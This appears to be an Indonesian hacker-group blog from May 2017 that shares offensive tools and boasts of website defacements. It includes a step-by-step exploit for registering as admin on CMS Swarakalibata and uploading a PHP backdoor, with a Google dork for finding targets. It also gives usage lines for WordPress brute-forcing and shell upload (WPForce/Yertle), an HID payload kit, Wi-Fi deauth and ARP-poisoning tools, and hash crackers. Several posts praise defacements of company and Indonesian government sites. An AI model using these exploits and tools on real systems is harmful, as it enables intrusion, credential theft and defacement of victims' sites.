Minggu, 28 Mei 2017

Brutal - Toolkit untuk membuat berbagai Payload, PowerShell Attack, Virus Attack dan Launch Listener untuk HID dengan cepat.


Sebelum itu admin mengucapkan selamat menunaikan ibadah puasa
Link Download Tool nya:https://github.com/screetsec/brutal

Tested:KALI LINUX.
AUTHOR:KATENBAD/EXI2T CYBER TEAM
Greetz:All member EXI2T CYBER TEAM


Fungsi BRUTAL TOOLKIT:Brutal sangat berguna untuk mengeksekusi skrip pada mesin target tanpa memerlukan interaksi antara manusia ke keyboard (HID -ATTACK). Saat Anda memasukkan perangkat, ini akan terdeteksi sebagai keyboard, dan menggunakan mikroprosesor dan penyimpanan memori flash onboard. , Anda dapat mengirim serangkaian penekanan tombol yang sangat cepat ke mesin target dan kompromikan sepenuhnya, terlepas dari autorun. Saya telah menggunakannya dalam pengujian keamanan saya untuk menjalankan skrip rekonisi atau pencacahan, mengeksekusi kerang balik, memanfaatkan kerentanan eskalasi DLL / hak istimewa lokal eskalasi, dan mendapatkan semua kata sandinya. Sekarang im mengembangkan tool baru namanya Brutal


Jadi apa Brutal?
Brutal adalah toolkit untuk membuat payload dengan cepat, serangan PowerShell, serangan virus dan pendengar peluncuran untuk Human Interface Device




TUTORIAL VIDIO




Apakah Anda ingin seperti robot mr hacking adegan ketika Angela moss pasang usb ke komputer untuk mendapatkan informasi kredensial? Anda bisa memilih payload secara brutal (optional 3 atau 4)
Hasil Menghasilkan berbagai payload dan serangan PowerShell tanpa coding Untuk membantu memecahkan komputer dengan sangat cepat dan lincah: hlm Kompatibilitas Payloads> hanya menargetkan mesin Windows
Getting Started 
  1. Copy and paste the PaensyLib folder inside your Arduino\libraries
  2. git clone https://github.com/Screetsec/Brutal.git
  3. cd Brutal
  4. chmod +x Brutal.sh
  5. sudo ./Brutal.sh or sudo su ./Brutal.sh
Read More

SKRIP DEFACE AKA KATENBAD DARI EXI2T CYBER TEAM



Hallo gan saya autor Ter gans di zonne-id Saya akan membagikan skrip deface aka katenbad dari EXI2T CYBER TEAM :) comod gan
demo skrip nya ctrl+u aja ea

http://systemlink.co.th/bannerright/20170528084346.html
Read More

Dagon - Advanced Hash Manipulation


Pengertian Dagon:

Dinamai oleh Pangeran Neraka, Dagon (hari-pergi) adalah sistem hash cracking and manipulation yang canggih, yang mampu meniru beberapa jenis hash, membuat kamus tanpa kekerasan, verifikasi algoritma hashing otomatis, pembangkit garam acak dari Unicode sampai ASCII, dan masih banyak lagi.

Screenshots

Screenshot Bruteforcing dibuat mudah dengan pencipta daftar kata yang dibangun jika Anda tidak menentukannya. Daftar kata akan menghasilkan 100.000 string untuk digunakan


Verifikasi algoritma apa yang digunakan untuk membuat hash yang Anda coba buat. Anda dapat menentukan untuk melihat semua algoritma yang mungkin dengan memberikan flag -L (beberapa algoritma belum diimplementasikan)


Asap acak, pengasapan acak unicode, atau Anda bisa memilih sendiri 




Penggunaan dasar
Untuk fungsi penuh dari Dagon, silakan merujuk homepage di sini
Python dagon.py -h Ini akan menjalankan menu bantuan dan memberikan daftar semua flag yang mungkin
Python dagon.py -c --bruteforce Ini akan mencoba untuk memberi label hash tertentu
Python dagon.py -l --bruteforce Ini akan mencoba untuk memberi bruteforce file yang berisi hash (satu per baris)
Python dagon.py -v Ini akan mencoba untuk memverifikasi algoritma yang digunakan untuk membuat hash
Python dagon.py -V Ini akan mencoba untuk memverifikasi setiap hash dalam sebuah file, satu per baris

Installation

Dagon membutuhkan versi python 2.7.x agar bisa berjalan dengan sukses.
Git klon https://github.com/ekultek/dagon.git
Cd Dagon
Pip install -r requirement.txt
Ini harus menginstal semua dependensi yang Anda perlukan untuk menjalankan Dagon

Contributions

Semua kontribusi sangat dihargai dan bermanfaat. Bila Anda berkontribusi, Anda akan mendapatkan nama Anda ditempatkan di beranda di bawah kontribusi dengan tautan ke kontribusi Anda. Anda juga akan sangat menghormati saya, dan itu adalah hal yang sangat keren. Yang saya cari dalam kontribusi adalah beberapa hal berikut:
Kreasi algoritma hashing, khususnya; Algoritma MD2 lebih cepat, algoritma Tiger penuh, algoritma Keychain untuk awan dan tangkas
Daftar kata-kata yang lebih banyak untuk diunduh, tolong pastikan tautannya dikodekan
Implementasi serangan Rainbow table
Ekspresi lebih teratur untuk memverifikasi jenis hash yang berbeda


Read More

NSEarch - Nmap Scripting Engine Search


Link Download Toolnya:https://drive.google.com/file/d/0B1jnESvV-xjubjl5Z183NWRfUjA/view

Pengertian:

Nsearch, adalah alat yang membantu Anda menemukan skrip yang digunakan oleh nmap (nse), Anda dapat mencari skrip menggunakan kata kunci differents sebagai nama, kategori dan pengarang, bahkan menggunakan semua kata kunci dalam satu kueri, juga dimungkinkan. Untuk melihat dokumentasi dari script yang didirikan.

Requeriments
$ pip install pyyaml python-i18nDebian(Ubuntu)
# apt-get install unzip libreadline-gplv2-dev build-essential checkinstall unzip sqlite3 libsqlite3-dev -y
REDHAT(CentOS)
# yum -y install bzip2 groupinstall "Development Tools"
Installation To install the application is necessary run as root user the installation script (install.sh), for the time, the script is only for OS based on debian and based on Red Hat (CentOS). MacOSX or other UNIX it's better do the installation for each dependency manually. Automatic Installation
# sh install.sh
File Configuration Find the script.db's path, use the command below
$ find /usr -type f -name "script.db" 2>/dev/null | awk 'gsub("script.db","")'
Then create a config.yaml file, on the main path of the script
config:
  scriptsPath: '/usr/local/share/nmap/scripts/'
  filePath: '/usr/local/share/nmap/scripts/script.db'
  fileBackup: 'scriptbk.db'
  scriptdb: 'nmap_scripts.sqlite3'
  categories: {"auth","broadcast","brute","default","discovery","dos","exploit","external","fuzzer","intrusive","malware","safe","version","vuln"}
USAGE:
  $ python nsearch.py
Main Menu Initial Setup
 ================================================
    _   _  _____  _____                     _
   | \ | |/  ___||  ___|                   | |
   |  \| |\ `--. | |__    __ _  _ __   ___ | |__
   | . ` | `--. \|  __|  / _` || '__| / __|| '_  |
   | |\  |/\__/ /| |___ | (_| || |   | (__ | | | |
   \_| \_/\____/ \____/  \__,_||_|    \___||_| |_|
  ================================================
   Version 0.4b http://goo.gl/8mFHE5  @jjtibaquira
   Email: jko@dragonjar.org  |   www.dragonjar.org
  ================================================

  Creating Database :nmap_scripts.sqlite3
  Creating Table For Script ....
  Creating Table for Categories ....
  Creating Table for Scripts per Category ....
  Upload Categories to Categories Table ...
Main Console
  ================================================
    _   _  _____  _____                     _
   | \ | |/  ___||  ___|                   | |
   |  \| |\ `--. | |__    __ _  _ __   ___ | |__
   | . ` | `--. \|  __|  / _` || '__| / __|| '_  |
   | |\  |/\__/ /| |___ | (_| || |   | (__ | | | |
   \_| \_/\____/ \____/  \__,_||_|    \___||_| |_|
  ================================================
   Version 0.4b http://goo.gl/8mFHE5  @jjtibaquira
   Email: jko@dragonjar.org  |   www.dragonjar.org
  ================================================

  Cheking DB ... nmap_scripts.sqlite3
  The DB is updated nmap_scripts.sqlite3

  nsearch>
Basic Commands
  ================================================
    _   _  _____  _____                     _
   | \ | |/  ___||  ___|                   | |
   |  \| |\ `--. | |__    __ _  _ __   ___ | |__
   | . ` | `--. \|  __|  / _` || '__| / __|| '_  |
   | |\  |/\__/ /| |___ | (_| || |   | (__ | | | |
   \_| \_/\____/ \____/  \__,_||_|    \___||_| |_|
  ================================================
   Version 0.4b http://goo.gl/8mFHE5  @jjtibaquira
   Email: jko@dragonjar.org  |   www.dragonjar.org
  ================================================

  nsearch> help

  Nsearch Commands
  ================
  addfav  clear  delfav  doc  exit  help  history  last  modfav  search showfav

  nsearch>
  ================================================
    _   _  _____  _____                     _
   | \ | |/  ___||  ___|                   | |
   |  \| |\ `--. | |__    __ _  _ __   ___ | |__
   | . ` | `--. \|  __|  / _` || '__| / __|| '_  |
   | |\  |/\__/ /| |___ | (_| || |   | (__ | | | |
   \_| \_/\____/ \____/  \__,_||_|    \___||_| |_|
  ================================================
   Version 0.4b http://goo.gl/8mFHE5  @jjtibaquira
   Email: jko@dragonjar.org  |   www.dragonjar.org
  ================================================

  nsearch> help search

    name     : Search by script's name
    category : Search by category
    author   : Search by author
    Usage:
      search name:http
      search category:exploit
      search author:fyodor
      search name:http category:exploit author:fyodor

  nsearch>
  ================================================
    _   _  _____  _____                     _
   | \ | |/  ___||  ___|                   | |
   |  \| |\ `--. | |__    __ _  _ __   ___ | |__
   | . ` | `--. \|  __|  / _` || '__| / __|| '_  |
   | |\  |/\__/ /| |___ | (_| || |   | (__ | | | |
   \_| \_/\____/ \____/  \__,_||_|    \___||_| |_|
  ================================================
   Version 0.4b http://goo.gl/8mFHE5  @jjtibaquira
   Email: jko@dragonjar.org  |   www.dragonjar.org
  ================================================

  nsearch> search name:http author:calderon category:vuln
  *** Name                                     Author
  [+] http-vuln-cve2012-1823.nse               Paulino Calderon, Paul AMAR
  [+] http-phpself-xss.nse                     Paulino Calderon
  [+] http-wordpress-enum.nse                  Paulino Calderon
  [+] http-adobe-coldfusion-apsa1301.nse       Paulino Calderon
  [+] http-vuln-cve2013-0156.nse               Paulino Calderon
  [+] http-awstatstotals-exec.nse              Paulino Calderon
  [+] http-axis2-dir-traversal.nse             Paulino Calderon
  [+] http-huawei-hg5xx-vuln.nse               Paulino Calderon
  [+] http-tplink-dir-traversal.nse            Paulino Calderon
  [+] http-trace.nse                           Paulino Calderon
  [+] http-litespeed-sourcecode-download.nse   Paulino Calderon
  [+] http-majordomo2-dir-traversal.nse        Paulino Calderon
  [+] http-method-tamper.nse                   Paulino Calderon
  ================================================
    _   _  _____  _____                     _
   | \ | |/  ___||  ___|                   | |
   |  \| |\ `--. | |__    __ _  _ __   ___ | |__
   | . ` | `--. \|  __|  / _` || '__| / __|| '_  |
   | |\  |/\__/ /| |___ | (_| || |   | (__ | | | |
   \_| \_/\____/ \____/  \__,_||_|    \___||_| |_|
  ================================================
   Version 0.4b http://goo.gl/8mFHE5  @jjtibaquira
   Email: jko@dragonjar.org  |   www.dragonjar.org
  ================================================

  nsearch> doc ssh 
  ssh-hostkey.nse      ssh2-enum-algos.nse  sshv1.nse
  nsearch> doc sshv1.nse
  local nmap = require "nmap"
  local shortport = require "shortport"
  local string = require "string"

  description = [[
    Checks if an SSH server supports the obsolete and less secure SSH Protocol Version 1.
  ]]
  author = "Brandon Enright"
  nsearch>
Favorites Feature
  ================================================
    _   _  _____  _____                     _
   | \ | |/  ___||  ___|                   | |
   |  \| |\ `--. | |__    __ _  _ __   ___ | |__
   | . ` | `--. \|  __|  / _` || '__| / __|| '_  |
   | |\  |/\__/ /| |___ | (_| || |   | (__ | | | |
   \_| \_/\____/ \____/  \__,_||_|    \___||_| |_|
  ================================================
   Version 0.4b http://goo.gl/8mFHE5  @jjtibaquira
   Email: jko@dragonjar.org  |   www.dragonjar.org
  ================================================

  nsearch> addfav name:http-vuln-cve2012-1823.nse ranking:great
  [+] http-vuln-cve2012-1823.nse The Script was added successfully
  nsearch>
  ================================================
    _   _  _____  _____                     _
   | \ | |/  ___||  ___|                   | |
   |  \| |\ `--. | |__    __ _  _ __   ___ | |__
   | . ` | `--. \|  __|  / _` || '__| / __|| '_  |
   | |\  |/\__/ /| |___ | (_| || |   | (__ | | | |
   \_| \_/\____/ \____/  \__,_||_|    \___||_| |_|
  ================================================
   Version 0.4b http://goo.gl/8mFHE5  @jjtibaquira
   Email: jko@dragonjar.org  |   www.dragonjar.org
  ================================================

  nsearch> showfav
  *** Name                                     Ranking
  [+] sslv2.nse                                normal
  [+] http-vuln-cve2012-1823.nse               great
  nsearch>
  ================================================
    _   _  _____  _____                     _
   | \ | |/  ___||  ___|                   | |
   |  \| |\ `--. | |__    __ _  _ __   ___ | |__
   | . ` | `--. \|  __|  / _` || '__| / __|| '_  |
   | |\  |/\__/ /| |___ | (_| || |   | (__ | | | |
   \_| \_/\____/ \____/  \__,_||_|    \___||_| |_|
  ================================================
   Version 0.4b http://goo.gl/8mFHE5  @jjtibaquira
   Email: jko@dragonjar.org  |   www.dragonjar.org
  ================================================

  nsearch> showfav
  *** Name                                     Ranking
  [+] sslv2.nse                                normal
  [+] http-vuln-cve2012-1823.nse               great

  nsearch> modfav name:sslv2.nse newranking:great
  [+] sslv2.nse The Script was updated successfully

  nsearch> showfav
  *** Name                                     Ranking
  [+] sslv2.nse                                great
  [+] http-vuln-cve2012-1823.nse               great
  nsearch>
  ================================================
    _   _  _____  _____                     _
   | \ | |/  ___||  ___|                   | |
   |  \| |\ `--. | |__    __ _  _ __   ___ | |__
   | . ` | `--. \|  __|  / _` || '__| / __|| '_  |
   | |\  |/\__/ /| |___ | (_| || |   | (__ | | | |
   \_| \_/\____/ \____/  \__,_||_|    \___||_| |_|
  ================================================
   Version 0.4b http://goo.gl/8mFHE5  @jjtibaquira
   Email: jko@dragonjar.org  |   www.dragonjar.org
  ================================================

  nsearch> showfav
  *** Name                                     Ranking
  [+] sslv2.nse                                great
  [+] http-vuln-cve2012-1823.nse               great

  nsearch> delfav name:sslv2.nse
  [+] sslv2.nse The Script was removed successfully

  nsearch> showfav
  *** Name                                     Ranking
  [+] http-vuln-cve2012-1823.nse               great

  nsearch>

Thanks TO AKA KATENBAD
Read More

Deface Register & Upload CMS Swarakalibata


CMS Swarakalibata adalah CMS Lokomedia yang dimodifikasi oleh Rizal Faizal, Dan sekarang sudah dikembangkan lebih jauh lagi oleh phpmu.com.
Bug Register & Upload ini sangat memungkinkan Attacker untuk mendaftar menjadi Admin/Kontributor dan meng-Upload Backdoor dengan Extensi PHP di modul berita tanpa harus mem-Bypass Extensi Backdoor tersebut.

Proof Of Concept:
  1. Cari target site yang menggunakan CMS Swarakalibata, atau juga bisa menggunakan Google dork dibawah untuk mencari target.
  2. Masuk kehalaman register dengan menambahkan register.html pada url target. contoh: site.com/register.html.
  3. Lengkapi form pendaftaran, pilih foto ( disini agan sudah bisa mengupload Backdoor dengan format extensi .php.pjpeg ).
  4. Klik daftar sekarang, dan agan akan dialihkan kehalaman Administrator.
  5. Upload Backdoor agan dengan cara tambah berita, upload gambar ( disini agan tidak perlu mem-Bypass extensi backdoor agan ).
  6. Untuk mengetahui letak Backdoor agan cukup dengan klik kanan pada gambar ( Backdoor ) yang agan upload dan klik copy.

Google Dork:i
ntext:"PENDAFTARAN UNTUK KONTRIBUTOR ARTIKEL"
Read More

Kamis, 18 Mei 2017

BruteXSS - Tool to find XSS vulnerabilities in web application

 Download nya gan di bawah
https://drive.google.com/open?id=0B1jnESvV-xjuOVNyZlFtdGZGaW8

Penjelasan Tool nya


BruteXSS adalah alat yang ditulis di python hanya untuk menemukan kerentanan XSS dalam aplikasi web.
Alat ini awalnya dikembangkan oleh Shawar Khan di CLI. Aku hanya mendesain ulang dan membuatnya GUI untuk lebih convienience.

Alat ini dikembangkan dengan Python, jadi jelas cross platform, Anda hanya perlu menginstal Python di mesin Anda.


Steps
   Download saja alat Anda & jalankan brutexss.py (semua alat yang dibutuhkan disediakan untuk itu)




 



Read More

PloitKit - The Hacker's ToolBox


PloitKit adalah alat GUI berbasis Python yang dirancang sebagai satu atap untuk semua perangkat lunak lainnya. Saya menghadapi masalah seperti ini, ketika saya harus beralih ke sistem yang berbeda, atau kehilangan pen drive saya. Saya harus pergi ke google, dan mencari setiap alat dan mendownload setiap alat dan sebagainya. Jadi saya memutuskan untuk membuat alat, dimana saya hanya klik dan klik dan tool ada disana.
Saya telah menambahkan lebih dari 900 + alat dalam alat ini, namun hanya 400+ yang tersedia sekarang, untuk menguji apakah alat ini akan berfungsi, jika berhasil, saya akan menyediakannya untuk semua orang


Link Download nya dibawah Gan

https://drive.google.com/open?id=0B1jnESvV-xjuUnRVZFVqZXdmYXM
Features
  1. Auto-Update - No need to come over here, and look for new version every time.
  2. Better Error Handling - Some tools may cause error, that's why I added this option.
  3. Graphical Interface - For just click & click.
  4. Malware Protectiong - All tools are downloaded from their original source, so no malwares or any viruses.
  5. Multi-Platform - Many tools are for designed differently for Mac, Windows & Linux, so I added option for that. Choose your platform and you're good to go.
  6. Better organised - Everything is better organised nothing like search everything, and all that mess. 
Saya percaya itu, tidak ada yang tidak sempurna, jadi saya menambahkan opsi untuk melaporkan alat, atau mengirimkan saran tentang alat baru apa pun, saya harus menambahkannya.

Usage

git clone https://github.com/rajeshmajumdar/PloitKit.git
 
Windows

ploitkit.py
 
UNIX or Mac

python ploitkit.py  
 
Read More

WPForce - Wordpress Attack Suite


WPForce adalah rangkaian alat Wordpress Attack. Saat ini berisi 2 skrip - WPForce, yang memaksa login melalui API, dan Yertle, yang mengupload kerang setelah kredensial admin ditemukan. Yertle juga berisi sejumlah modul pasca eksploitasi.

Link Download:https://drive.google.com/open?id=0B1jnESvV-xjuOGdfZ1o0Sm5BT0E

Untuk informasi lebih lanjut, kunjungi posting blog di sini: https://www.n00py.io/2017/03/squeezing-the-juice-out-of-a-compromised-wordpress-server/


 Features:

    Brute Force via API, not login form bypassing some forms of protection
    Can automatically upload an interactive shell
    Can be used to spawn a full featured reverse shell
    Dumps WordPress password hashes
    Can backdoor authentication fuction for plaintext password collection
    Inject BeEF hook into all pages
    Pivot to meterpreter if needed


Install:

Yertle requires the requests libary to run.
http://docs.python-requests.org/en/master/user/install/


Usage:

python wpforce.py -i usr.txt -w pass.txt -u "http://www.[website].com"

   ,-~~-.___.       __        __ ____   _____
  / |  x     \      \ \      / /|  _ \ |  ___|___   _ __  ___  ___
 (  )        0       \ \ /\ / / | |_) || |_  / _ \ | '__|/ __|/ _ \.
  \_/-, ,----'  ____  \ V  V /  |  __/ |  _|| (_) || |  | (__|  __/
     ====      ||   \_ \_/\_/   |_|    |_|   \___/ |_|   \___|\___|
    /  \-'~;   ||     |
   /  __/~| ...||__/|-"   Brute Force Attack Tool for Wordpress
 =(  _____||________|                 ~n00py~

Username List: usr.txt (3)
Password List: pass.txt (21)
URL: http://www[website].com
--------------------------
[xxxxxxxxxxxxx@gmail.com : xxxxxxxxxxxxx] are valid credentials!  - THIS ACCOUNT IS ADMIN
--------------------------
--------------------------
[xxxxxxxxxxxxx@icloud.com : xxxxxxxxxxxx] are valid credentials!
--------------------------
 100% Percent Complete
All correct pairs:
{'xxxxxxxxxxxxx@icloud.com': 'xxxxxxxxxxxxx', 'xxxxxxxxxxxxx@gmail.com': 'xxxxxxxxxxxxx'}

 -h, --help            show this help message and exit
  -i INPUT, --input INPUT
                        Input file name
  -w WORDLIST, --wordlist WORDLIST
                        Wordlist file name
  -u URL, --url URL     URL of target
  -v, --verbose         Verbose output. Show the attemps as they happen.
  -t THREADS, --threads THREADS
                        Determines the number of threads to be used, default
                        is 10
  -a AGENT, --agent AGENT
                        Determines the user-agent
  -d, --debug           This option is used for determining issues with the
                        script.


python yertle.py -u "[username]" -p "[password]" -t "http://www.[website].com" -i
     _..---.--.    __   __        _   _
   .'\ __|/O.__)   \ \ / /__ _ __| |_| | ___
  /__.' _/ .-'_\    \ V / _ \ '__| __| |/ _ \.
 (____.'.-_\____)    | |  __/ |  | |_| |  __/
  (_/ _)__(_ \_)\_   |_|\___|_|   \__|_|\___|
   (_..)--(.._)'--'         ~n00py~
      Post-exploitation Module for Wordpress

Backdoor uploaded!
Upload Directory: ebwhbas
os-shell>



  -h, --help            show this help message and exit
  -i, --interactive     Interactive command shell
  -r, --reverse         Reverse Shell
  -t TARGET, --target TARGET
                        URL of target
  -u USERNAME, --username USERNAME
                        Admin username
  -p PASSWORD, --password PASSWORD
                        Admin password
  -li IP, --ip IP       Listener IP
  -lp PORT, --port PORT
                        Listener Port
  -v, --verbose         Verbose output.
  -e EXISTING, --existing EXISTING
                        Skips uploading a shell, and connects to existing
                        shell 
 
Yertle currently contains these modules:

Core Commands
=============
 
Command                   Description
-------                   -----------
?                         Help menu
beef                      Injects a BeEF hook into website
exit                      Terminate the session
hashdump                  Dumps all WordPress password hashes
help                      Help menu
keylogger                 Patches WordPress core to log plaintext credentials
keylog                    Displays keylog file
meterpreter               Executes a PHP meterpreter stager to connect to metasploit
quit                      Terminate the session
shell                     Sends a TCP reverse shell to a netcat listener
stealth                   Hides Yertle from the plugins page 

Read More

WPSeku - Simple Wordpress Security Scanner

Sesuai Judul Gua Ingin SHARE TOOL WPSEKU apakah wp seku tool Wp seku adalah tool untuk mengecek celah web berbasis Wordpress
 Link Download 1
https://drive.google.com/open?id=0B1jnESvV-xjuTXVMWWkyeGZTZEk
 Link Download 2
https://drive.google.com/open?id=0B1jnESvV-xjuZWdSN1RreGprVVE
WARNING
WPSeku adalah pemindai kerentanan kotak hitam WordPress yang bisa digunakan untuk memindai instalasi WordPress jarak jauh untuk menemukan masalah keamanan.
  
Usage


                           _            
  __      ___ __  ___  ___| | ___   _   
  \ \ /\ / / '_ \/ __|/ _ \ |/ / | | |  
   \ V  V /| |_) \__ \  __/   <| |_| |  
    \_/\_/ | .__/|___/\___|_|\_\\__,_|  
           |_|                          
[--] WPSeku - Wordpress Security Scanner 
[--] WPSeku - v0.1.0                     
[--] Momo Outaadi (@M4ll0k)              
[--] https://github.com/m4ll0k/WPSeku  

Usage: wpseku.py --url URL

 -u --url Site URL (e.g: http://site.com)
 -e --enum
  [u:  Usernames Enumeration
 -p --plugin
  [x:  Search Cross Site Scripting vuln
  [l:  Search Local File Inclusion vuln
  [s:  Search SQL Injection vuln
 -t --theme
  [x:  Search Cross Site Scripting vuln
  [l:  Search Local File Inclusion vuln
  [s:  Search SQL Injection vuln
 -b --brute
  [l:  Bruteforce password login
  [x:  Bruteforce password login via XML-RPC
 --user  Set username, try with enum users
 --wordlist Set wordlist
 -h --help Show this help and exit
Examples:
  wpseku.py -u www.site.com
  wpseku.py -u www.site.com -e [u]
  wpseku.py -u site.com/path/wp-content/plugins/wp/wp.php?id= -p [x,l,s]
  wpseku.py -u site.com --user test --wordlist dict.txt -b [l,x]

 
Screenshot 
 
 
 
Read More

NETATTACK 2 - An Advanced Wireless Network Scan and Attack Script



Hallo Fans Zonne-id saya akan membagikan tool NETATTACK
Penjelasan Tool NETATTACK



Link Download Tool nya

https://drive.google.com/open?id=0B1jnESvV-xjua2JkeE9IcFNGUHM

NETATTACK 2 adalah skrip python yang memindai dan menyerang jaringan lokal dan nirkabel. Semuanya super mudah karena GUI yang membuatnya tidak perlu mengingat perintah dan parameter.

FUNCTIONS

SCAN-FUNCTIONS

  • Scan for Wi-Fi networks
  • Scan for local hosts in your network

ATTACK-FUNCTIONS
  • Deauthing ONE / MULTIPLE targets
  • Deauthing every AP in your area
  • Kicking (ALL) user/s off your internet ( ARP-Poisoning )

REQUIREMENTS
LINUX!
  • nmap
  • argparse (Python)
  • scapy (Python)
  • iw
 Autor:Zonne-id Staff 
Jika ingin COPAS SERTAKAN SUMBER Salam Zonne-id
Read More

Tool Sql Injection Pybel

 Hallo Fans Zonne-id Hari ini CEO EXI2T CYBER TEAM Meluncurkan Tool Pybel apakah tool pybel itu
disimak rincian nya ea :) 

Download
https://drive.google.com/open?id=0B1jnESvV-xjuLURaVDFFSjNicms

Baca Dulu sebelum make gan
Pybelt adalah open source hacker tool belt lengkap dengan:

  • A port scanner
  • SQL injection scanner
  • Dork checker
  • Hash cracker
  • Hash type verification tool
  • Proxy finding tool
  • XSS scanner

Hal ini mampu memecahkan hash tanpa pengetahuan sebelumnya tentang algoritma, memindai port pada host tertentu, mencari kerentanan SQLi di URL yang diberikan, memverifikasi bahwa Google Dorks Anda bekerja seperti seharusnya, memverifikasi algoritma hash yang diberikan, memindai URL Untuk kerentanan XSS, dan menemukan proxy HTTP yang dapat digunakan.

Pemindaian SQL Injection menjadi mudah, cukup berikan URL 

 
 Dork checker, punya beberapa Dork yang tidak Anda yakini? Lanjutkan dan jalankan cek Dork dengan Dork sebagai argumen, ini akan menarik 100 URL dan memberi Anda tingkat keberhasilan untuk Dork


Hash cracking dibuat sederhana, berikan tipe hash pada akhirnya ": md5,: sha256, etc" untuk hash tertentu, atau ": all" untuk semua algoritma yang tersedia di Pc anda 


Dan masih banyak lagi!

Pemakaian

Instalasi
Anda bisa mengkloning repositori
 


Syntax nya

 pip install -r requirements.txt



Ini akan menginstal semua program yang dibutuhkan perpustakaan dan harus bisa dijalankan dari sana.
### Fungsi



python pybelt.py -p 127.0.0.1

 

Akan menjalankan port scan pada host lokal kamu gan

 

python pybelt.py -s http://example.com/php?id=2



Akan menjalankan SQLi scan pada URL yang diberikan



python pybelt.py -d idea?id=55



Akan menjalankan cek Dork pada Google Dork yang diberikan   



python pybelt.py -c 9a8b1b7eee229046fc2701b228fc2aff:all


Akan mencoba memecahkan hash menggunakan semua algoritma yang ada di komputer



python pybelt.py -v 098f6bcd4621d373cade4e832627b4f6



Akan mencoba untuk memverifikasi jenis hash



python pybelt.py -f



 

Akan menemukan proxy yang bisa digunakan


python pybelt.py -x http://127.0.0.1/php?id=1



Akan mencari URL untuk kerentanan XSS



Thanks Gan Jika inggin COMOD Silahkan Jika Ingin Copy Janggan Lupa Sertakan Sumber

Thanks Author:EXI2T CYBER TEAM AWH Gans

Salam Dari Zonne-id

  
 
Read More

Selasa, 09 Mei 2017

Hacker ini Retas Situs International Games System


Hacker Yang Kodenama 0x404 dari Team Family Attack Cyber, Meretas International Games System 

International Games System adalah perusahaan yang berbasis di Taiwan yang mengembangkan perangkat lunak permainan video untuk lemari arcade dan komputer rumah. Didirikan pada tahun 1989.
Sumber -> WikiPedia
Kalian bisa melihat Mirror pada Website Tersebut

 dan untuk alamat website 
http://igsgame.com/ 


Read More

KEMBALI BERAKSI, GANTENGERS CREW RETAS CGV INDONESIA

Dengan SAYA DARI Zonne id dan CEO ter gans di EXI2T CYBER TEAM
Berita ini saya sampaikan :)kepada seluruh pembaca" manca negara kita lagi" Peretasan terjadi kembali


Terciduknya salahsatu pentolan Gantengers Crew yaitu Sultan Haikal beberapa waktu lalu ternyata tidak membuat tim ini mati. Meski sempat "tertidur" untuk beberapa bulan, kali ini mereka kembali menampakkan diri ditandai dengan diretasnya domain CGV Indonesia.

CGV Cinemas (sebelumnya bernama blitzmegaplex dan CGV blitz) merupakan salah satu jaringan bioskop di Indonesia yang menawarkan konsep baru untuk memberikan pengalaman yang berbeda saat menonton film.

Mereka memang tidak meretas domain utama cgv.id . Namun dengan keberhasilan mereka menambahkan subdomain gc.cgv.id menandakan mereka memiliki akses server atau ke panel domain.
saat kalian membuka url gc.cgv.id maka akan muncul latar hitam dengan tulisan :
Gantengers Crew

g0t h1j4cK

defacer_indonesia@ymail.com

Gantengers Crew
./Sorry
Sampai berita ini dirilis subdomain yang sengaja ditambahkan oleh Gantengers Crew tersebut masih bisa diakses.
Kalian juga bisa melihat mirror nya disini :

Read More

News Badan BMKG atau Badan Meteorologi,Klimitologi,dan Geofisika di retas


Hello Pembaca Berita Zonne id :) Kali ini Hacker dengan kode nama  R0cky_n00bz Ft Korlset



Meretas situs http://karangploso.jatim.bmkg.go.id/ nampak nya sang attacker tidak merusak sistem tersebut
dan attacker hanya menitipkan file yp.html
domain utama juga berhasil di susupii semakin banyak nya hacker yang menyerang pemerintahan indonesia membuat pemerintah terciut nyali
inilah domain" yg berhasil di susupin

http://samratulangi.sulut.bmkg.go.id/yp.html
 http://maritimperak2.jatim.bmkg.go.id/yp.html
http://karangploso.jatim.bmkg.go.id/yp.html
dan zona h nya 
http://www.zone-h.org/mirror/id/29371851
http://www.zone-h.org/mirror/id/29371846
http://www.zone-h.org/mirror/id/29371836

dari hal yg kita ketahui ada pesan yang di sampaikan kepada attacker walaupun tidak secara frontal mengubah tampilan utama web tersebut 

isi pesan tersebut adalah

indonesian Cyber Freedom

Marhaban ya Ramadhan

___________________________________
We Are : dEnny_Attacker - Mr. DellatioNx196 - SvN_NeVerMore - Achan Dot ID - Mr.HaurgeulisX196 - SengkeL - Railver6 - TOGEL3739 - Hit Girl - Ghost99 - Rona404 - xpecto - Dawn_angel - nG0xz - Fathur.xZ - aAn - Bangka Boys - DUR74N4 - CaptSalkus ./r0cky_n00bz .
___________________________________________________
#3rdIndCyberFreedom #GALAU

Sekian dari KAMI zonne id Perwakilan defacer indonesia mengucapkan Selamat beraktifitas kembali 
Author:KATENBAD EXI2T CYBER TEAM
Read More
 
EXI2T CYBER TEAM © 2011 Templates | uzanc